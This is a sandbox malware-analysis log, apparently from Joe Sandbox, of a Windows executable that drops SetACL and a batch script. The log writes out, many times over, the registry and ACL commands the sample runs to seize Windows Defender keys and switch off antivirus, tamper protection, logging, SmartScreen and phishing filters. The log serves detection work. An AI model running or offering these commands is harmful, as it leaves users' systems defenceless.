Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012D46503_2_012D4650
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012C1E803_2_012C1E80
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStunned.exe8 vs P196hUN2fw.exe
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetACL.exe. vs P196hUN2fw.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exe C0ABBEEA8AE726503BC5643F3471E378D92FCB59A37043062BBF9BA64D95004C
Source: P196hUN2fw.exeReversingLabs: Detection: 54%
Source: P196hUN2fw.exeVirustotal: Detection: 46%
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile read: C:\Users\user\Desktop\P196hUN2fw.exeJump to behavior
Source: P196hUN2fw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\P196hUN2fw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\P196hUN2fw.exe C:\Users\user\Desktop\P196hUN2fw.exe
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.batJump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012A2150 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,3_2_012A2150
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356D.tmpJump to behavior
Source: classification engineClassification label: mal60.winEXE@147/12@0/0
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_00404496 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404496
